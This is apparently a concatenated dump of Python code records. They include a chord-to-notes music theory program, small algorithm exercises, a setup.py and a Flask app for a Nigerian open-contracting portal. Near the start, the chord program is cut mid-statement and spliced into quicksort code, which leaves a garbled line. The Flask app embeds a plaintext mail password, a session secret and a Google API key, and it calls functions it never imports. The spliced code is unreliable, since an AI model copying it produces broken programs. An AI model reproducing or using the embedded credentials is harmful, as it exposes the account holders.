inter=interList[mIndex]\n result=oNote.value\n #print('inter is',inter)\n if inter>0:\n for i in range(inter):\n result=result+'#'\n elif inter<0:\n # print('result after plus b',result)\n for i in range(-inter):\n result=result+'b'\n \n # print('result before return',result)\n return result\n\ndef Aug6Chord(mKey,type):\n chordNotes=[]\n output=[]\n result=NoteInRoman(ModeType.Major,mKey,'VI')\n firstNote=NoteShift(True,result[0])\n #print('fn',result[2],'sn',firstNote)\n output.append(NoteResult(result[2],firstNote))\n chordNotes.append(firstNote)\n chordNotes.append(mKey)\n output.append(mKey.value)\n if type==SChordType.FA6:\n result=NoteInRoman(ModeType.Major,mKey,'II')\n chordNotes.append(result[0])\n output.append(NoteResult(result[2],result[0]))\n elif type==SChordType.GA6:\n result=NoteInRoman(ModeType.Major,mKey,'III')\n thirdNote=NoteShift(True,result[0])\n output.append(NoteResult(result[2],thirdNote))\n chordNotes.append(thirdNote)\n result=NoteInRoman(ModeType.Major,mKey,'IV')\n lastNote=NoteShift(False,result[0])\n chordNotes.append(lastNote)\n\n #print('result 2 is ',result[2])\n output.append(NoteResult(result[2],lastNote))\n\n return chordNotes,output\n\ndef GetOutput(output):\n re=''\n for c in output:\n re=re+c+' '\n return re\n#find the chord notes\ndef NotesOfChord(mode,chord,root):\n #Find the first correct notes.\n \n output=[]\n cNotes=[]\n output.append(NoteResult(root,chord.root))\n #print('chord root origin',output,'chord root note is',chord.root)\n cFirstNote=root\n cNotes.append(root)\n firstNote=chord.root\n secondNote=firstNote\n for i in range (chord.num.value-1):\n firstIndex=noteTable[firstNote]\n if(chord.type==ChordType.Major): \n interval=majorChordTable[i+1].value\n secondIndex=firstIndex+interval\n #print('second index',secondIndex)\n if(chord.type==ChordType.Minor or chord.type==ChordType.Minorf5):\n interval=minorChordTable[i+1].value\n secondIndex=firstIndex+interval\n if(chord.type==ChordType.Dominant):\n interval=dominantCHordTable[i+1].value\n secondIndex=firstIndex+interval\n if(chord.type==ChordType.Dim):\n interval=3\n secondIndex=firstIndex+3\n if(chord.type==ChordType.Aug):\n interval=augChordTable[i+1].value\n secondIndex=firstIndex+augChordTable[i+1].value\n if(secondIndex>12):\n secondIndex=secondIndex-12\n for note in noteTable:\n if noteTable[note]==secondIndex:\n secondNote=note\n # print('befor sharp check')\n result=InterCheck(interval,cFirstNote,secondNote)\n output.append(result[0])\n cSecondNote=result[1]\n cNotes.append(cSecondNote)\n chord.addNotes(secondNote)\n firstNote=secondNote\n cFirstNote=cSecondNote\n if chord.type==ChordType.Minorf5:\n #n print('minorf5')\n chord.notes[2]=NoteShift(True,chord.notes[2])\n output[2]=NoteResult(cNotes[2],chord.notes[2])\n\n #check the speial type \n if chord.sType==None:\n print('no special')\n else:\n if mode.type==ModeType.Major: \n if chord.sType==SChordType.flat:\n chord.notes[0]=NoteShift(True,chord.notes[0])\n output[0]=NoteResult(cNotes[0],chord.notes[0])\n chord.notes[2]=NoteShift(True,chord.notes[2])\n output[2]=NoteResult(cNotes[2],chord.notes[2])\n elif chord.sType==SChordType.D:\n chord.notes[3]=NoteShift(True,chord.notes[3])\n output[3]=NoteResult(cNotes[3],chord.notes[3])\n elif mode.type==ModeType.Minor:\n if chord.sType==SChordType.flat:\n chord.notes[0]=NoteShift(True,chord.notes[0])\n output[0]=NoteResult(cNotes[0],chord.notes[0])\n if chord.sType==SChordType.plus:\n chord.notes[1]=NoteShift(False,chord.notes[1])\n output[1]=NoteResult(cNotes[1],chord.notes[1])\n if chord.sType==SChordType.D:\n chord.notes[0]=NoteShift(False,chord.notes[0])\n output[0]=NoteResult(cNotes[0],chord.notes[0])\n outputString=GetOutput(output)\n if chord.sType==SChordType.GA6 or chord.sType==SChordType.FA6 or chord.sType==SChordType.IA6:\n result= Aug6Chord(mode.root,chord.sType) \n chord.notes=result[0]\n output=result[1]\n outputString=GetOutput(output)\n #print('chord notes are ',chord.notes)\n #print('output is ',output)\n \n return output\n\ndef NoteInRomanCheck():\n mType=ModeType.Major\n for note,index in wholeNoteTable.items():\n print('chord note is ',note)\n for roman in R_N_table:\n print('chord roman is ',roman)\n chord,num,cChord=NoteInRoman(mType,note,roman)\n print('chord root is ',chord)\n print('chord origin is ',cChord)\n print('\\n')\ndef ChordToNotesCheck():\n #inputModeList=['C#','D#','E#','F#','G#','A#','B#']\n inputModeList=['C','cb']\n #inputDisList=['I','II','III','IV','V','VI','VII']\n inputDisList=['DVII']\n #inputDisList=['I+','bII','IV+','V+','GVI','FVI','ItVI']\n\n for inputMode in inputModeList:\n print('input mode is',inputMode)\n for inputDis in inputDisList:\n print('input dis is',inputDis)\n inputNum='2'\n output=ChordToNote(inputMode,inputDis,inputNum)\n #print('output is ',output)\n\ndef ChordToNote(mRoot,dis,num):\n if(mRoot[0]==mRoot[0].lower()):\n modeType=ModeType.Minor\n mRoot=mRoot.upper()\n elif(mRoot[0]==mRoot[0].upper()):\n modeType=ModeType.Major\n if(len(mRoot)>1):\n if mRoot[1]=='B':\n mRoot=mRoot[0]+'b'\n print('mode root is',mRoot)\n for note in Note:\n if note.value==mRoot:\n modeRoot=note\n \n #print(modeRoot)\n inputMode=Mode(modeRoot,modeType)\n #print('inputMode mode root is',modeRoot,'input mode mode type is ',modeType)\n if dis[-1]=='+':\n inputSType=SChordType.plus\n dis=dis[:-1]\n #print('in plus')\n \n elif dis[0]=='b':\n inputSType=SChordType.flat\n dis=dis[1:]\n elif dis[0]=='G':\n inputSType=SChordType.GA6\n dis=dis[1:]\n elif dis[0]=='F':\n inputSType=SChordType.FA6\n dis=dis[1:]\n elif dis[0]=='D':\n inputSType=SChordType.D\n dis=dis[1:]\n elif dis[:2]=='It':\n inputSType=SChordType.IA6\n dis=dis[2:]\n else:\n inputSType=None\n\n chordRoot,inputRoman,cChordRoot=NoteInRoman(modeType,modeRoot,dis)\n # print('chord root is ',chordRoot)\n #print(\"input ROman is \",inputRoman)\n #print('cChordRoot is ',cChordRoot)\n if num=='1':\n if(inputMode.type==ModeType.Major):\n #print('input mode type is major')\n chordType=MajModeTtable[inputRoman]\n inputChord= Chord(chordRoot, ChordNum.triad,chordType,inputSType)\n inputChord.notes = [chordRoot]\n #print('inputchord ',inputChord.notes)\n elif(inputMode.type==ModeType.Minor):\n # print('input mode type is minor')\n chordType=MinModeTtable[inputRoman]\n inputChord= Chord(chordRoot, ChordNum.triad,chordType,inputSType)\n inputChord.notes = [chordRoot]\n elif num=='2':\n if(inputMode.type==ModeType.Major):\n chordType=MajModeStable[inputRoman] \n inputChord= Chord(chordRoot,ChordNum.seventhChord,chordType,inputSType)\n inputChord.notes = [chordRoot]\n elif(inputMode.type==ModeType.Minor):\n chordType=MinModeStable[inputRoman] \n inputChord= Chord(chordRoot,ChordNum.seventhChord,chordType,inputSType)\n inputChord.notes = [chordRoot]\n \n output=''\n \n #print('input chord type is ',inputChord.type)\n output=NotesOfChord(inputMode,inputChord,cChordRoot)\n '''\n # result=[]\n result = \"\"\n for note in returnNotes:\n # result.append(note.value)\n result += note.value\n result += \" \"\n return result\n '''\n return output\n# chord table\nmajorModeTable=[[Note.C,Note.D,Note.E,Note.F,Note.G,Note.A,Note.B], \n [Note.D,Note.E,Note.G_f,Note.G,Note.A,Note.B,Note.D_f], \n [Note.E,Note.G_f,Note.A_f,Note.A,Note.B,Note.D_f,Note.E_f],\n [Note.F,Note.G,Note.A,Note.B_f,Note.C,Note.D,Note.E], \n [Note.G,Note.A,Note.B,Note.C,Note.D,Note.E,Note.G_f],\n [Note.A,Note.B,Note.D_f,Note.D,Note.E,Note.G_f,Note.A_f],\n [Note.B,Note.D_f,Note.E_f,Note.E,Note.G_f,Note.A_f,Note.B_f]]\nminorModeTable=[[Note.C,Note.D,Note.E_f,Note.F,Note.G,Note.A_f,Note.B_f],\n [Note.D,Note.E,Note.F,Note.G,Note.A,Note.B_f,Note.C],\n [Note.E,Note.G_f,Note.G,Note.A,Note.B,Note.C,Note.D],\n [Note.F,Note.G,Note.A_f,Note.B_f,Note.C,Note.D_f,Note.E_f],\n [Note.G,Note.A,Note.B_f,Note.C,Note.D,Note.E_f,Note.F],\n [Note.A,Note.B,Note.C,Note.D,Note.E,Note.F,Note.G],\n [Note.B,Note.D_f,Note.D,Note.E,Note.G_f,Note.G,Note.A]]\naugChordTable={1:M_I.M3,2:M_I.M3,3:M_I.M2}\nmajorChordTable={1:M_I.M3,2:M_I.m3,3:M_I.M3,4:M_I.m3,5:M_I.m3,6:M_I.M3}\nminorChordTable={1:M_I.m3,2:M_I.M3,3:M_I.m3,4:M_I.M3,5:M_I.m3,6:M_I.M3}\ndominantCHordTable={1:M_I.M3,2:M_I.m3,3:M_I.m3,4:M_I.M3,5:M_I.m3,6:M_I.M3}\nnoteTable={Note.C:1,Note.D_f:2,Note.D:3,Note.E_f:4,Note.E:5,Note.F:6,Note.G_f:7,Note.G:8,Note.A_f:9,Note.A:10,Note.B_f:11,Note.B:12} \nwholeNoteTable={Note.C_f:12,Note.C:1,Note.C_s:2,Note.D_f:2,Note.D:3,Note.D_s:4,Note.E_f:4,Note.E:5,Note.E_s:6,Note.F_f:5,Note.F:6,Note.F_s:7,Note.G_f:7,Note.G:8,Note.G_s:9,Note.A_f:9,Note.A:10,Note.A_s:11,Note.B_f:11,Note.B:12,Note.B_s:0} \nflatCheckTable={Note.C:1,Note.D:2,Note.E:3,Note.F:4,Note.G:5,Note.A:6,Note.B:7} \nflatCheckList=[Note.C,Note.D,Note.E,Note.F,Note.G,Note.A,Note.B]\nflatList=[Note.C_f,Note.D_f,Note.E_f,Note.F_f,Note.G_f,Note.A_f,Note.B_f]\nsharpList=[Note.C_s,Note.D_s,Note.E_s,Note.F_s,Note.G_s,Note.A_s,Note.B_s]\n#roman number table \nR_N_table={'I':1,'II':2,'III':3,'IV':4,'V':5,'VI':6,'VII':7}\n# major mode triad table\nMajModeTtable={1:ChordType.Major,2:ChordType.Minor,3:ChordType.Minor,4:ChordType.Major,5:ChordType.Major,6:ChordType.Minor,7:ChordType.Dim}\n#major mode seventh table\nMajModeStable={1:ChordType.Major,2:ChordType.Minor,3:ChordType.Minor,4:ChordType.Major,5:ChordType.Dominant,6:ChordType.Minor,7:ChordType.Minorf5}\n#minor mode triad table\nMinModeTtable={1:ChordType.Minor,2:ChordType.Dim,3:ChordType.Major,4:ChordType.Minor,5:ChordType.Minor,6:ChordType.Major,7:ChordType.Major}\n#minor mode seventh table\nMinModeStable={1:ChordType.Minor,2:ChordType.Minorf5,3:ChordType.Major,4:ChordType.Minor,5:ChordType.Minor,6:ChordType.Major,7:ChordType.Dominant}\ndef main():\n #main function\n print('input \\'quit\\' to quit')\n \n \n while input()!='quit':\n \n mode=input('Choose your identification mode\\n 1.Chord to note\\n')\n print('mode') \n while mode!='1' and mode!='2':\n mode=input('Wrong input. Please input the correct answer\\n')\n '''\n if mode=='1':\n inputValue=input('in note to chord mode\\n input your notes\\n')\n outputChord=Chord()\n notes=inputValue.split()\n for inputNote in notes:\n for note in Note:\n if inputNote==note.value:\n outputChord.addNotes(note)\n outputChord.root=outputChord.notes[0]\n #print(outputChord.notes)\n if len(notes)==3:\n outputChord.num=ChordNum.triad\n elif len(notes)==4:\n outputChord.num=ChordNum.seventhChord\n firstNote=outputChord.root\n secondNote=firstNote\n for note in outputChord.notes:\n secondNote=note\n if secondNote==firstNote:\n continue\n else:\n if noteTable[secondNote] equal[0]:\n right.append(numbers[i])\n else:\n equal.append(numbers[i])\n\n return left + equal + right\n\n\nif __name__ == '__main__':\n input() # skip size\n numbers = list(map(int, input().split()))\n\n result = partition(numbers)\n print(' '.join(map(str, result)))\n","sub_path":"Python/Algorithms/Sorting/Quicksort 1 - Partition v2.py","file_name":"Quicksort 1 - Partition v2.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"265777144","text":"#%%\nif '__file__' in globals(): ## search dezero \n import os, sys\n sys.path.append(os.path.join(os.path.dirname(__file__),\"..\"))\n\nimport numpy as np \nimport dezero.functions as F\nfrom dezero import Variable\n\nx = np.array([1,2,3])\ny = np.broadcast_to(x,(2,3))\nprint(y)\n# %%\nfrom dezero.utils import sum_to\n\nx = np.array([[1,2,3],[4,5,6]])\ny = sum_to(x,(1,3))\nprint(y)\n\ny = sum_to(x,(2,1))\nprint(y)\n# %%\nx0 = np.array([1,2,3])\nx1 = np.array([10])\ny = x0+x1\nprint(y)\n# %%\nx0 = Variable(np.array([1,2,3]))\nx1 = Variable(np.array([10]))\ny = x0+x1\nprint(y)\n\n# %%\nx0 = Variable(np.array([1,2,3]))\nx1 = Variable(np.array([10]))\ny = x0+x1\nprint(y)\ny.backward()\nprint(x1.grad)\n","sub_path":"Chapter4/step40.py","file_name":"step40.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"497763655","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n hash_map = {}\n for i in range(len(nums)):\n remain = target - nums[i]\n if remain in hash_map:\n return [hash_map[remain], i]\n hash_map[nums[i]] = i\n\n def twoSumII(self, numbers: List[int], target: int) -> List[int]:\n first = 0\n last = len(numbers) - 1\n while first <= last:\n if numbers[first] + numbers[last] == target:\n return [first+1, last+1]\n elif numbers[first] + numbers[last] > target:\n last -= 1\n else:\n first += 1\n return [-1, -1]\n","sub_path":"leetcode/sums.py","file_name":"sums.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"18826561","text":"from setuptools import setup\n\nfrom codecs import open\nfrom os import path\n\n# Get the long description from the README file\nlong_description = ''\ntry:\n with open(path.join(path.abspath(path.dirname(__file__)), 'README.rst')) as f:\n long_description = f.read()\nexcept IOError:\n print(\"could not locate README\")\n pass\n\n\nsetup(\n name='pfycat',\n version='0.1.2',\n packages=['pfycat'],\n url='https://gitlab.com/juergens/pfycat',\n long_description=long_description,\n license='',\n author=u'wotaini',\n author_email='pypi@wotanii.de',\n description='python wrapper for gfycat',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n install_requires=['requests'],\n)","sub_path":"pypi_install_script/pfycat-0.1.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"217444932","text":"#! /usr/bin/python3\n# encoding=utf-8\n\n\ndef natural():\n n = 2\n while True:\n yield n\n n = n + 1\n\n\ndef odds_it():\n n = 3\n while True:\n yield n\n n = n + 2\n\n\ndef not_divisible(n):\n return lambda x: x % n > 0\n\n\ndef primes():\n it = natural()\n while True:\n n = next(it)\n yield n\n it = filter(not_divisible(n), it)\n\n\nif __name__ == '__main__':\n for n in primes():\n if n > 1000:\n break\n print(n)\n","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"271193108","text":"from flask import Flask, Response, render_template, url_for, jsonify, session, request, flash, redirect, send_from_directory, send_file, make_response\nfrom flask_mail import Message, Mail\nimport random, datetime, string, os, webbrowser, json, zipfile, requests\nfrom bson import json_util\nfrom flask import Flask, flash, render_template, json, request, url_for, redirect\nfrom werkzeug import generate_password_hash, check_password_hash\nfrom werkzeug import secure_filename\nfrom flask import session\nimport random\n\nfrom pymongo import MongoClient\n#from datetime import datetime\nimport datetime\n\n\n####################################app configurations ########################################################\npageLimit = 20\ntoday = datetime.date.today().strftime(\"%Y-%m-%d\")\napp = Flask(__name__)\napp.secret_key = 'why would I tell you my secret key?'\napp.config[\"MAIL_SERVER\"] = \"mail.nigeriaoc.org\"\napp.config[\"MAIL_PORT\"] = 465\napp.config[\"MAIL_USE_SSL\"] = True\napp.config[\"MAIL_USERNAME\"] = 'app@nigeriaoc.org'\napp.config[\"MAIL_PASSWORD\"] = '@nigeria2017'\napp.config['UPLOAD_FOLDER'] = '/media/ruth/U/NOCOPO/static/uploads'\napp.config['ALLOWED_EXTENSIONS'] = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif', 'json', 'csv', 'docx', 'xlsx', 'xls', 'doc'])\nmail = Mail()\nmail.init_app(app)\nlanguage=\"EN\"\n###############################################################error handlers#####################################################\n\n\n###########################################################################################################################################################\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template(\"errors/404.html\"), 404\n\n@app.errorhandler(500)\ndef server_error(e):\n return render_template(\"errors/500.html\"), 500\n\n@app.errorhandler(403)\ndef forbidden(e):\n return render_template(\"errors/403.html\"), 403\n\n@app.errorhandler(410)\ndef page_pulled(e):\n return render_template(\"errors/410.html\"), 410\n\n##############################################################################################Dashboard#####################################################\n\n\n\n\n################################################################utilities###################################################################################\n#####connects to mongo db database and returns Cursor\ndef connect_db():\n c = MongoClient(host=\"localhost\", port=27017)\n db = c.open_contracts\n return db\n\ndb = connect_db()\n\n@app.template_filter('datetime')\ndef _jinja2_filter_datetime(date):\n if date == \"\" or date ==\"null\":\n return \"null\"\n try:\n date = date.split(\"T\")[0]\n formatted = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n except:\n formatted=None\n return formatted\n\ndef js(cursor, ocid=None):\n\n \n if ocid != None:\n data = list(db.releases.find({\"ocid\": ocid}))\n for i in data:\n i.pop(\"_id\")\n db.close\n data = jsonify(data)\n try:\n return data.get_data()\n except:\n return \"Oops, Something Went Wrong\"\n else:\n data = json.dumps(cursor)\n return data\n\n\ndef intervals(end, start):\n if end == \"\" or end==\"null\" or start == \"null\" or start == \"\" or end==None or start==None:\n return None\n tdelta = end - start\n years = 0;\n months = 0;\n days = 0;\n\n if tdelta.days >= 365:\n years = round(tdelta.days / 365)\n m = tdelta.days % 365\n if m > 0:\n months = round(m / 30)\n days = m % 30\n\n elif tdelta.days >= 30 and tdelta.days < 365:\n months = round(tdelta.days / 30)\n days = tdelta.days % 30\n else:\n days = tdelta.days\n\n interval = [str(years) + \" years \", str(months) + \" months \", str(days) + \" days \"];\n diff = \"\"\n for i in interval:\n if i[0] != \"0\":\n diff += i\n return diff\n\n\ndef repl(stri,old, new):\n replaces = [\")\", \"(\", \".\", \"&\", \"/\", \"'\"]\n for i in replaces:\n stri = stri.replace(i, \"\")\n return stri.replace(old,new)\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS']\n\n\ndef getCoords(address):\n api_key = \"AIzaSyCSTh76cAoDiRGgW4k1l_NRn7UMvlihdK0\"\n api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}'.format(address))\n api_response_dict = api_response.json()\n\n if api_response_dict['status'] == 'OK':\n latitude = api_response_dict['results'][0]['geometry']['viewport']['northeast']['lat']\n longitude = api_response_dict['results'][0]['geometry']['viewport']['northeast']['lng']\n return [latitude, longitude]\n\n\ndef bubbles(db_data):\n data = []\n\n for element in db_data:\n if element['planning']['basicdata']['procurementcategory'] and element['planning']['basicdata'][\n 'procurementcategory'] != \"\" and element['contracts']['implementation']['tilldate'] and \\\n element['contracts']['implementation']['tilldate'] != \"\":\n data.append(\n {\"value\": int(element['planning']['budget']['amount']['amount']), \"name\": element['description'],\n \"group\": element['planning']['basicdata']['procurementcategory'],\n \"progress\": int(element['contracts']['implementation']['tilldate'])})\n\n return json.dumps(data)\n\n\n####parses a time and date 'ocid_date'\ndef parse_datetime(ocid_date):\n if ocid_date == \"\" or ocid_date == \"null\":\n return False\n \n if ocid_date:\n ocid_date_no = datetime.datetime.strptime(ocid_date, \"%Y-%m-%d\")\n return ocid_date_no\n else:\n emptyfield = \"null\"\n return emptyfield\n\n#####################################uploads##################################\n\n##############################################UPLOADS\n\n# Route that will process the file upload\n@app.route('/planningUpload', methods=['POST'])\ndef upload():\n if session.get('user'):\n # return render_template('userHome.html')\n\n # Get the name of the uploaded file\n file = request.files['file']\n OCID = request.form['OCID']\n\n print(OCID)\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n # Move the file from the temporal folder to\n # the upload folder we setup\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # store filename in mongodb\n query = db.releases.update_one({\"ocid\": OCID},\n {\n \"$push\":\n {\n \"planning.documents\": (filename)\n\n }\n\n })\n\n if query.modified_count is 1:\n # TO REMOVE/REUSE\n # Redirect the user to the uploaded_file route, which\n # will basicaly show on the browser the uploaded file\n # return redirect(url_for('uploaded_file',\n # filename=filename))\n return render_template('myplans.html')\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n\n@app.route('/tenderUpload', methods=['POST'])\ndef tenderUpload():\n if session.get('user'):\n # return render_template('userHome.html')\n\n # Get the name of the uploaded file\n file = request.files['file']\n OCID = request.form['OCID']\n\n print(OCID)\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n # Move the file from the temporal folder to\n # the upload folder we setup\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # store filename in mongodb\n query = db.releases.update_one({\"ocid\": OCID},\n {\n \"$push\":\n {\n \"tender.documents\": (filename)\n\n }\n\n })\n\n if query.modified_count is 1:\n # TO REMOVE/REUSE\n # Redirect the user to the uploaded_file route, which\n # will basicaly show on the browser the uploaded file\n # return redirect(url_for('uploaded_file',\n # filename=filename))\n return render_template('mytenders.html')\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n\n@app.route('/contractUpload', methods=['POST'])\ndef contractUpload():\n if session.get('user'):\n # return render_template('userHome.html')\n\n # Get the name of the uploaded file\n file = request.files['file']\n OCID = request.form['OCID']\n\n print(OCID)\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n # Move the file from the temporal folder to\n # the upload folder we setup\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # store filename in mongodb\n query = db.releases.update_one({\"ocid\": OCID},\n {\n \"$push\":\n {\n \"contracts.documents\": (filename)\n\n }\n\n })\n\n if query.modified_count is 1:\n # TO REMOVE/REUSE\n # Redirect the user to the uploaded_file route, which\n # will basicaly show on the browser the uploaded file\n # return redirect(url_for('uploaded_file',\n # filename=filename))\n return render_template('mycontracts.html')\n\n else:\n return render_template('dashboard/error.html', error='Unauthorized Access')\n\n##########################################end uploads#############################################################\n\n#######################################downloads#####################################################\n@app.route('/planDownload', methods=['POST'])\ndef planDownload():\n directory = os.path.dirname(os.path.abspath(__file__))\n test = os.listdir(directory)\n\n # delete previously stored zips\n for item in test:\n if item.endswith(\".zip\"):\n os.remove(os.path.join(directory, item))\n\n _id = request.form['OCID']\n documents = db.releases.find_one({\"ocid\": _id})\n\n # begin downloading new zip\n timestamp = strftime('%Y-%m-%d:%H-%M-%S', gmtime())\n zfname = 'files-' + str(timestamp) + '.zip'\n zf = zipfile.ZipFile(zfname, \"w\")\n for dirname, subdirs, files in os.walk(app.config['UPLOAD_FOLDER']):\n # zf.write(dirname)\n if documents:\n doc = documents['planning']['documents']\n filename = str(doc[0])\n for documentname in doc:\n print(str(documentname))\n for filename in files:\n if documentname == filename:\n zf.write(dirname + filename, filename)\n zf.close()\n\n return send_from_directory(directory, zfname, as_attachment=True)\n\n\n# download tender documents\n@app.route('/tenderDownload', methods=['POST'])\ndef tenderDownload():\n directory = os.path.dirname(os.path.abspath(__file__))\n test = os.listdir(directory)\n\n # delete previously stored zips\n for item in test:\n if item.endswith(\".zip\"):\n os.remove(os.path.join(directory, item))\n\n _id = request.form['OCID']\n documents = db.releases.find_one({\"ocid\": _id})\n\n # begin downloading new zip\n timestamp = strftime('%Y-%m-%d:%H-%M-%S', gmtime())\n zfname = 'files-' + str(timestamp) + '.zip'\n zf = zipfile.ZipFile(zfname, \"w\")\n for dirname, subdirs, files in os.walk(app.config['UPLOAD_FOLDER']):\n # zf.write(dirname)\n if documents:\n\n doc = documents['tender']['documents']\n filename = str(doc[0])\n for documentname in doc:\n print(str(documentname))\n for filename in files:\n if documentname == filename:\n zf.write(dirname + filename, filename)\n zf.close()\n\n return send_from_directory(directory, zfname, as_attachment=True)\n\n\n# download contract documents\n@app.route('/contractDownload', methods=['POST'])\ndef contractDownload():\n directory = os.path.dirname(os.path.abspath(__file__))\n test = os.listdir(directory)\n\n # delete previously stored zips\n for item in test:\n if item.endswith(\".zip\"):\n os.remove(os.path.join(directory, item))\n\n _id = request.form['OCID']\n documents = db.releases.find_one({\"ocid\": _id})\n\n # begin downloading new zip\n timestamp = strftime('%Y-%m-%d:%H-%M-%S', gmtime())\n zfname = 'files-' + str(timestamp) + '.zip'\n zf = zipfile.ZipFile(zfname, \"w\")\n for dirname, subdirs, files in os.walk(app.config['UPLOAD_FOLDER']):\n # zf.write(dirname)\n if documents:\n\n doc = documents['contracts']['documents']\n filename = str(doc[0])\n for documentname in doc:\n print(str(documentname))\n for filename in files:\n if documentname == filename:\n zf.write(dirname + filename, filename)\n zf.close()\n\n return send_from_directory(directory, zfname, as_attachment=True)\n\n#################################end downloads#############################################################################\n\n###validates a user is registered and signed in to view page 'pathtofile' and returns\ndef validate_access(pathtofile, vars=None):\n if session.get('user'):\n return render_template(pathtofile, vars=vars)\n else:\n return render_template('forms/signin.html',\n error='You must be registered and signed in to view any internal contract details')\n\n\n###creates a new release data model and returns a json object with empty release data feilds\ndef create_bpp_data_model(ocid, description, agency, ministry):\n rl = {\n \"ocid\": ocid,\n \"id\": \"ocds-gyl66f-Example MDA-1\",\n \"description\": description,\n \"agencyreference\": session[\"reference\"],\n \"tag\": [\n \"contract\"\n ],\n \"buyer\": {\n \"identifier\": {\n \"legalName\": agency\n }\n },\n \"website\": \"www.uniben.com\",\n \"date\": \"\",\n \"language\": \"\",\n \"tender\": {\n \"title\": description,\n \"procuringEntity\": {\n \"additionalIdentifiers\": [\n {\n \"legalName\": ministry\n }\n ],\n \"name\": ministry\n },\n \"description\": description,\n \"status\": \"\",\n \"advertisementdate\": \"\",\n \"advertmedia\": \"\",\n \"value\": {\n \"amount\": 0\n },\n \"procurementMethod\": \"\",\n \"rationale\": \"\",\n \"bppletterofobjection\": \"\",\n \"awardcriteria\": \"\",\n \"awardcriteriadetails\": \"\",\n \"submissionmethod\": \"\",\n \"submissionmethoddetails\": \"\",\n \"hasenquiries\": \"\",\n \"enquiryperiod\": \"\",\n \"enquiryperiodend\": \"\",\n \"haspetition\": \"\",\n \"petitionremark\": \"\",\n \"eligibilitycriteria\": \"\",\n \"numberoftenderers\": \"\",\n \"awardstart\": \"\",\n \"awardend\": \"\",\n \"projtype\": \"\",\n \"tenderPeriodstart\": \"\",\n \"tenderPeriodend\": \"\",\n \"docs\": []\n ,\n \"milestones\": [\n {\n \"status\": \"On-Going\"\n }\n ],\n \"actualadvert\": \"\",\n \"actualadvertend\": \"\",\n \"actualevaluation\": \"\",\n \"actualevaluationend\": \"\",\n \"actualshortlistapprove\": \"\",\n \"actualshortlistapproveend\": \"\",\n \"actualshortlistpublish\": \"\",\n \"actualproposalinvite\": \"\",\n \"actualproposalinviteend\": \"\",\n \"actualopeningoftechprop\": \"\",\n \"actualevaluationtech\": \"\",\n \"actualevaluationtechend\": \"\",\n \"actualevaluationtechapprov\": \"\",\n \"actualevaluationtechapprovend\": \"\",\n \"actualopenfinancialprop\": \"\",\n \"actualsubmittechreport\": \"\",\n \"actualsubmittechreportend\": \"\",\n \"actualnegotiations\": \"\",\n \"actualnegotiationsend\": \"\",\n \"actualprocuringenteval\": \"\",\n \"actualprocuringentevalend\": \"\",\n \"actualcertificateobj\": \"\",\n \"actualcertificateobjend\": \"\",\n \"actualadvertprequal\": \"\",\n \"actualadvertprequalend\": \"\",\n \"actualprequalopening\": \"\",\n \"actualevalpreqalsubm\": \"\",\n \"actualevalpreqalsubmend\": \"\",\n \"actualprequalapprov\": \"\",\n \"actualprequalapprovend\": \"\",\n \"actualprequalpublish\": \"\",\n \"actualfirstbid\": \"\",\n \"actualfirstbidend\": \"\",\n \"actualsecondbid\": \"\",\n \"actualsecondbidend\": \"\",\n \"actualbidinvite\": \"\",\n \"actualbidclose\": \"\",\n \"actualbidevaluation\": \"\",\n \"actualbidevaluationend\": \"\",\n \"actualprocuringenteval\": \"\",\n \"actualprocuringentevalend\": \"\",\n \"actualcertificateobjevalreport\": \"\",\n \"actualcertificateobjevalreportend\": \"\",\n \"actualfecapproval\": \"\",\n \"actualfecapprovalend\": \"\",\n \"actualcontractoffer\": \"\",\n \"actualcontractofferend\": \"\",\n \"actualcontractsignature\": \"\",\n \"actualcontractsignatureend\": \"\",\n \"actualmobilization\": \"\",\n \"actualmobilizationend\": \"\",\n \"actualsubmissiondraftrep\": \"\",\n \"actualsubmissionfinalrep\": \"\",\n \"actualgoodsarrival\": \"\",\n \"actualgoodsarrivalend\": \"\",\n \"actualsubstantialcomplete\": \"\",\n \"actualfinalaccept\": \"\",\n \"actualfinalacceptend\": \"\"\n },\n\n \"planning\": {\n \"identity\": {\n \"rationale\": \"\",\n \"description\": \"\",\n \"package\": \"\",\n \"lot\": \"\"\n },\n \"budget\": {\n \"amount\": {\n \"description\": description,\n \"code\": \"\",\n \"source\": \"\",\n \"amount\": 0,\n \"estimate\": 0\n }\n },\n \"basicdata\": {\n \"procurementcategory\": \"\",\n \"contracttype\": \"\",\n \"procurementmethod\": \"\",\n \"letterofobjection\": \"\",\n \"approvalauthority\": \"\",\n 